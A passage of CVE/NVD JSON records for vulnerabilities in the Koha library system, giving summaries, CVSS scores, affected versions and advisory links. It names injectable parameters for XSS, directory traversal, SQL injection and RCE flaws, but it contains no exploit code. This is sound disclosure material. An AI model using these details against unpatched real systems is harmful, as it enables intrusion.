"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.0"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2018-10-18T21:29:01.333",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14408"
},
{
"source": "cve@mitre.org",
"tags": [
"Release Notes"
],
"url": "https://koha-community.org/koha-3-14-16-released/"
},
{
"source": "cve@mitre.org",
"tags": [
"Release Notes"
],
"url": "https://koha-community.org/security-release-koha-3-16-12/"
},
{
"source": "cve@mitre.org",
"tags": [
"Release Notes"
],
"url": "https://koha-community.org/security-release-koha-3-18-8/"
},
{
"source": "cve@mitre.org",
"tags": [
"Release Notes"
],
"url": "https://koha-community.org/security-release-koha-3-20-1/"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "https://packetstormsecurity.com/files/132458/Koha-ILS-3.20.x-CSRF-XSS-Traversal-SQL-Injection.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://seclists.org/fulldisclosure/2015/Jun/80"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "https://www.exploit-db.com/exploits/37388/"
},
{
"source": "cve@mitre.org",
"tags": [
"Release Notes",
"Third Party Advisory"
],
"url": "https://www.sba-research.org/2015/06/24/researchers-of-sba-research-found-several-critical-security-vulnerabilities-in-the-koha-library-software-via-combinatorial-testing/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14408"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes"
],
"url": "https://koha-community.org/koha-3-14-16-released/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes"
],
"url": "https://koha-community.org/security-release-koha-3-16-12/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes"
],
"url": "https://koha-community.org/security-release-koha-3-18-8/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes"
],
"url": "https://koha-community.org/security-release-koha-3-20-1/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "https://packetstormsecurity.com/files/132458/Koha-ILS-3.20.x-CSRF-XSS-Traversal-SQL-Injection.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://seclists.org/fulldisclosure/2015/Jun/80"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "https://www.exploit-db.com/exploits/37388/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes",
"Third Party Advisory"
],
"url": "https://www.sba-research.org/2015/06/24/researchers-of-sba-research-found-several-critical-security-vulnerabilities-in-the-koha-library-software-via-combinatorial-testing/"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-22"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2015-01-02 20:59
Modified
2025-04-12 10:46
Severity ?
Summary
Multiple cross-site scripting (XSS) vulnerabilities in the Staff client in Koha before 3.16.6 and 3.18.x before 3.18.2 allow remote attackers to inject arbitrary web script or HTML via the sort_by parameter to the (1) opac parameter in opac-search.pl or (2) intranet parameter in catalogue/search.pl.
References
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:koha:koha:*:*:*:*:*:*:*:*",
"matchCriteriaId": "C30D5198-3DD8-4A4B-9816-08F40D11550B",
"versionEndIncluding": "3.16.05",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:koha:koha:3.18.0:*:*:*:*:*:*:*",
"matchCriteriaId": "0451D93C-F37E-42B3-88B4-9F549FBEEB9B",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:koha:koha:3.18.1:*:*:*:*:*:*:*",
"matchCriteriaId": "E536B062-0DD1-49BA-B251-A234AFC62A02",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Multiple cross-site scripting (XSS) vulnerabilities in the Staff client in Koha before 3.16.6 and 3.18.x before 3.18.2 allow remote attackers to inject arbitrary web script or HTML via the sort_by parameter to the (1) opac parameter in opac-search.pl or (2) intranet parameter in catalogue/search.pl."
},
{
"lang": "es",
"value": "M\u00faltiples vulnerabilidades de XSS en el client Staff en Koha anterior a 3.16.6 y 3.18.x anterior a 3.18.2 permiten a atacantes remotos inyecdtar secuencias de comandos web o HTML arbitrarios a trav\u00e9s del par\u00e1metro sort_by en el par\u00e1metro (1) opac en opac-search.pl o (2) el par\u00e1metro intranet en catalogue/search.pl."
}
],
"id": "CVE-2014-9446",
"lastModified": "2025-04-12T10:46:40.837",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
]
},
"published": "2015-01-02T20:59:04.930",
"references": [
{
"source": "cve@mitre.org",
"url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=13425"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Vendor Advisory"
],
"url": "http://koha-community.org/koha-3-16-6-release/"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Vendor Advisory"
],
"url": "http://koha-community.org/koha-3-18-2-release/"
},
{
"source": "cve@mitre.org",
"url": "http://secunia.com/advisories/61187"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit"
],
"url": "http://www.securityfocus.com/bid/71803"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=13425"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Vendor Advisory"
],
"url": "http://koha-community.org/koha-3-16-6-release/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Vendor Advisory"
],
"url": "http://koha-community.org/koha-3-18-2-release/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://secunia.com/advisories/61187"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit"
],
"url": "http://www.securityfocus.com/bid/71803"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Deferred",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-79"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2011-12-08 19:55
Modified
2025-04-11 00:51
Severity ?
Summary
Directory traversal vulnerability in cgi-bin/koha/mainpage.pl in Koha 3.4 before 3.4.7 and 3.6 before 3.6.1, and LibLime Koha 4.2 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the KohaOpacLanguage cookie to cgi-bin/opac/opac-main.pl, related to Output.pm.
References
Impacted products
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:koha:liblime_koha:*:*:*:*:*:*:*:*",
"matchCriteriaId": "A157B981-C57E-4758-8C99-D072AA00CDC6",
"versionEndIncluding": "4.2",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:koha:koha:3.06.00.000:*:*:*:*:*:*:*",
"matchCriteriaId": "C1FF9625-8924-4AFF-BDDD-44ECDD21B652",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:koha:koha:3.04.00:*:*:*:*:*:*:*",
"matchCriteriaId": "19846DCB-7BAA-4C48-B879-4ED2133FE055",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:koha:koha:3.04.01:*:*:*:*:*:*:*",
"matchCriteriaId": "C7890D6D-0BBD-4C78-BE9D-6C6E74CD0B43",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:koha:koha:3.04.02:*:*:*:*:*:*:*",
"matchCriteriaId": "52BF1075-0D4F-4615-B8DE-785ACB8146E0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:koha:koha:3.04.03:*:*:*:*:*:*:*",
"matchCriteriaId": "BD0160D1-0198-477B-A565-9CA5E627F0BA",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:koha:koha:3.04.04:*:*:*:*:*:*:*",
"matchCriteriaId": "B161E81A-158C-4BEF-B1C8-DD8C94D8E48E",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:koha:koha:3.04.05:*:*:*:*:*:*:*",
"matchCriteriaId": "6D972C41-F258-441A-AE2B-BD82322FA9B8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:koha:koha:3.04.06:*:*:*:*:*:*:*",
"matchCriteriaId": "18A1B156-CC67-49EA-9311-9F3CBA205C1C",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Directory traversal vulnerability in cgi-bin/koha/mainpage.pl in Koha 3.4 before 3.4.7 and 3.6 before 3.6.1, and LibLime Koha 4.2 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the KohaOpacLanguage cookie to cgi-bin/opac/opac-main.pl, related to Output.pm."
},
{
"lang": "es",
"value": "Vulnerabilidad de salto de directorio en cgi-bin/koha/mainpage.pl en Koha v3.4 antes de v3.4.7 y v3.6 antes de v3.6.1, y LibLime Koha v4.2 y anteriores permite a atacantes remotos leer archivos de su elecci\u00f3n a trav\u00e9s de .. (punto punto) en la cookie KohaOpacLanguage de cgi-bin/opac/opac-main.pl, relacionado con Output.pm."
}
],
"id": "CVE-2011-4715",
"lastModified": "2025-04-11T00:51:21.963",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
]
},
"published": "2011-12-08T19:55:08.187",
"references": [
{
"source": "cve@mitre.org",
"url": "http://koha-community.org/koha-3-4-7/#more-2971"
},
{
"source": "cve@mitre.org",
"url": "http://koha-community.org/koha-3-6-1/#more-2929"
},
{
"source": "cve@mitre.org",
"url": "http://osvdb.org/77322"
},
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "http://secunia.com/advisories/46980"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit"
],
"url": "http://www.exploit-db.com/exploits/18153"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit"
],
"url": "http://www.securityfocus.com/bid/50812"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit"
],
"url": "http://www.vigasis.com/en/?guncel_guvenlik=LibLime%20Koha%20%3C=%204.2%20Local%20File%20Inclusion%20Vulnerability\u0026lnk=exploits/18153"
},
{
"source": "cve@mitre.org",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/71478"
},
{
"source": "cve@mitre.org",
"url": "https://github.com/liblime/LibLime-Koha/commit/8ea6f7bc37d05a9ec25b5afbea011cf9de5f1e49#C4/Output.pm"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://koha-community.org/koha-3-4-7/#more-2971"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://koha-community.org/koha-3-6-1/#more-2929"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://osvdb.org/77322"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "http://secunia.com/advisories/46980"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit"
],
"url": "http://www.exploit-db.com/exploits/18153"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit"
],
"url": "http://www.securityfocus.com/bid/50812"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit"
],
"url": "http://www.vigasis.com/en/?guncel_guvenlik=LibLime%20Koha%20%3C=%204.2%20Local%20File%20Inclusion%20Vulnerability\u0026lnk=exploits/18153"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/71478"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://github.com/liblime/LibLime-Koha/commit/8ea6f7bc37d05a9ec25b5afbea011cf9de5f1e49#C4/Output.pm"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Deferred",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-22"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
CVE-2024-28739 (GCVE-0-2024-28739)
Vulnerability from cvelistv5
Published
2024-08-06 00:00
Modified
2024-08-06 20:54
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- n/a
Summary
An issue in Koha ILS 23.05 and before allows a remote attacker to execute arbitrary code via a crafted script to the format parameter.
References
{
"containers": {
"adp": [
{
"affected": [
{
"cpes": [
"cpe:2.3:a:koha:koha:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "koha",
"vendor": "koha",
"versions": [
{
"lessThanOrEqual": "23.05",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.6,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2024-28739",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-08-06T20:53:58.370756Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-79",
"description": "CWE-79 Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-08-06T20:54:07.974Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "An issue in Koha ILS 23.05 and before allows a remote attacker to execute arbitrary code via a crafted script to the format parameter."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-08-06T18:47:14.231319",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"url": "https://febin0x4e4a.wordpress.com/2024/03/07/xss-to-one-click-rce-in-koha-ils/"
}
]
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2024-28739",
"datePublished": "2024-08-06T00:00:00",
"dateReserved": "2024-03-08T00:00:00",
"dateUpdated": "2024-08-06T20:54:07.974Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2015-4639 (GCVE-0-2015-4639)
Vulnerability from cvelistv5
Published
2017-07-21 14:00
Modified
2024-08-06 06:18
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- n/a
Summary
Cross-site scripting (XSS) vulnerability in opac-addbybiblionumber.pl in Koha 3.14.x before 3.14.16, 3.16.x before 3.16.12, and 3.20.x before 3.20.1 allows remote attackers to inject arbitrary web script or HTML via a crafted list name.
References
| ▼ | URL | Tags |
|---|---|---|
| http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14416#c4 | x_refsource_CONFIRM | |
| https://koha-community.org/security-release-koha-3-16-12/ | x_refsource_CONFIRM | |
| https://koha-community.org/security-release-koha-3-20-1/ | x_refsource_CONFIRM | |
| https://koha-community.org/koha-3-14-16-released/ | x_refsource_CONFIRM |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T06:18:12.093Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14416#c4"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://koha-community.org/security-release-koha-3-16-12/"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://koha-community.org/security-release-koha-3-20-1/"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://koha-community.org/koha-3-14-16-released/"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2015-06-19T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Cross-site scripting (XSS) vulnerability in opac-addbybiblionumber.pl in Koha 3.14.x before 3.14.16, 3.16.x before 3.16.12, and 3.20.x before 3.20.1 allows remote attackers to inject arbitrary web script or HTML via a crafted list name."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-10-18T19:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14416#c4"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://koha-community.org/security-release-koha-3-16-12/"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://koha-community.org/security-release-koha-3-20-1/"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://koha-community.org/koha-3-14-16-released/"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2015-4639",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Cross-site scripting (XSS) vulnerability in opac-addbybiblionumber.pl in Koha 3.14.x before 3.14.16, 3.16.x before 3.16.12, and 3.20.x before 3.20.1 allows remote attackers to inject arbitrary web script or HTML via a crafted list name."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14416#c4",
"refsource": "CONFIRM",
"url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14416#c4"
},
{
"name": "https://koha-community.org/security-release-koha-3-16-12/",
"refsource": "CONFIRM",
"url": "https://koha-community.org/security-release-koha-3-16-12/"
},
{
"name": "https://koha-community.org/security-release-koha-3-20-1/",
"refsource": "CONFIRM",
"url": "https://koha-community.org/security-release-koha-3-20-1/"
},
{
"name": "https://koha-community.org/koha-3-14-16-released/",
"refsource": "CONFIRM",
"url": "https://koha-community.org/koha-3-14-16-released/"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2015-4639",
"datePublished": "2017-07-21T14:00:00",
"dateReserved": "2015-06-16T00:00:00",
"dateUpdated": "2024-08-06T06:18:12.093Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-5025 (GCVE-0-2023-5025)
Vulnerability from cvelistv5
Published
2023-09-17 07:00
Modified
2024-08-02 07:44
Severity ?
3.5 (Low) - CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N
3.5 (Low) - CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N
3.5 (Low) - CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N
VLAI Severity ?
EPSS score ?
CWE
- CWE-79 - Cross Site Scripting
Summary
A vulnerability was found in KOHA up to 23.05.03. It has been declared as problematic. This vulnerability affects unknown code of the file /cgi-bin/koha/catalogue/search.pl of the component MARC. The manipulation leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-239866 is the identifier assigned to this vulnerability.
References
| ▼ | URL | Tags |
|---|---|---|
| https://vuldb.com/?id.239866 | vdb-entry, technical-description | |
| https://vuldb.com/?ctiid.239866 | signature, permissions-required | |
| https://www.youtube.com/watch?v=b5107YkpgaM | media-coverage |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T07:44:53.733Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"vdb-entry",
"technical-description",
"x_transferred"
],
"url": "https://vuldb.com/?id.239866"
},
{
"tags": [
"signature",
"permissions-required",
"x_transferred"
],
"url": "https://vuldb.com/?ctiid.239866"
},
{
"tags": [
"media-coverage",
"x_transferred"
],
"url": "https://www.youtube.com/watch?v=b5107YkpgaM"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"modules": [
"MARC"
],
"product": "KOHA",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "23.05.03"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "Angel Metz"
},
{
"lang": "en",
"type": "analyst",
"value": "ph03n1xsp (VulDB User)"
}
],
"descriptions": [
{
"lang": "en",
"value": "A vulnerability was found in KOHA up to 23.05.03. It has been declared as problematic. This vulnerability affects unknown code of the file /cgi-bin/koha/catalogue/search.pl of the component MARC. The manipulation leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-239866 is the identifier assigned to this vulnerability."
},
{
"lang": "de",
"value": "In KOHA bis 23.05.03 wurde eine Schwachstelle ausgemacht. Sie wurde als problematisch eingestuft. Das betrifft eine unbekannte Funktionalit\u00e4t der Datei /cgi-bin/koha/catalogue/search.pl der Komponente MARC. Dank der Manipulation mit unbekannten Daten kann eine cross site scripting-Schwachstelle ausgenutzt werden. Der Angriff kann \u00fcber das Netzwerk angegangen werden. Der Exploit steht zur \u00f6ffentlichen Verf\u00fcgung."
}
],
"metrics": [
{
"cvssV3_1": {
"baseScore": 3.5,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N",
"version": "3.1"
}
},
{
"cvssV3_0": {
"baseScore": 3.5,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N",
"version": "3.0"
}
},
{
"cvssV2_0": {
"baseScore": 4,
"vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:N",
"version": "2.0"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-79",
"description": "CWE-79 Cross Site Scripting",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2023-10-24T19:09:41.254Z",
"orgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
"shortName": "VulDB"
},
"references": [
{
"tags": [
"vdb-entry",
"technical-description"
],
"url": "https://vuldb.com/?id.239866"
},
{
"tags": [
"signature",
"permissions-required"
],
"url": "https://vuldb.com/?ctiid.239866"
},
{
"tags": [
"media-coverage"
],
"url": "https://www.youtube.com/watch?v=b5107YkpgaM"
}
],
"timeline": [
{
"lang": "en",
"time": "2023-09-16T00:00:00.000Z",
"value": "Advisory disclosed"
},
{
"lang": "en",
"time": "2023-09-16T00:00:00.000Z",
"value": "CVE reserved"
},
{
"lang": "en",
"time": "2023-09-16T02:00:00.000Z",
"value": "VulDB entry created"
},
{
"lang": "en",
"time": "2023-10-12T14:58:51.000Z",
"value": "VulDB entry last update"
},
{
"lang": "en",
"time": "2023-12-09T00:00:00.000Z",
"value": "Vendor informed"
},
{
"lang": "en",
"time": "2023-12-09T00:00:00.000Z",
"value": "Vendor acknowledged"
}
],
"title": "KOHA MARC search.pl cross site scripting"
}
},
"cveMetadata": {
"assignerOrgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
"assignerShortName": "VulDB",
"cveId": "CVE-2023-5025",
"datePublished": "2023-09-17T07:00:07.258Z",
"dateReserved": "2023-09-16T08:19:19.064Z",
"dateUpdated": "2024-08-02T07:44:53.733Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2014-1925 (GCVE-0-2014-1925)
Vulnerability from cvelistv5
Published
2020-01-24 16:42
Modified
2024-08-06 09:58
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- n/a
Summary
SQL injection vulnerability in the MARC framework import/export function (admin/import_export_framework.pl) in Koha before 3.8.23, 3.10.x before 3.10.13, 3.12.x before 3.12.10, and 3.14.x before 3.14.3 allows remote authenticated users to execute arbitrary SQL commands via unspecified vectors. NOTE: this can be leveraged by remote attackers using CVE-2014-1924.
References
| ▼ | URL | Tags |
|---|---|---|
| http://koha-community.org/security-release-february-2014/ | x_refsource_MISC | |
| http://www.openwall.com/lists/oss-security/2014/02/07/10 | x_refsource_MISC | |
| http://www.openwall.com/lists/oss-security/2014/02/10/3 | x_refsource_MISC | |
| http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=11666 | x_refsource_MISC |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T09:58:15.638Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://koha-community.org/security-release-february-2014/"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2014/02/07/10"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2014/02/10/3"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=11666"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2014-02-07T00:00:00",
"descriptions": [
{
"lang": "en",
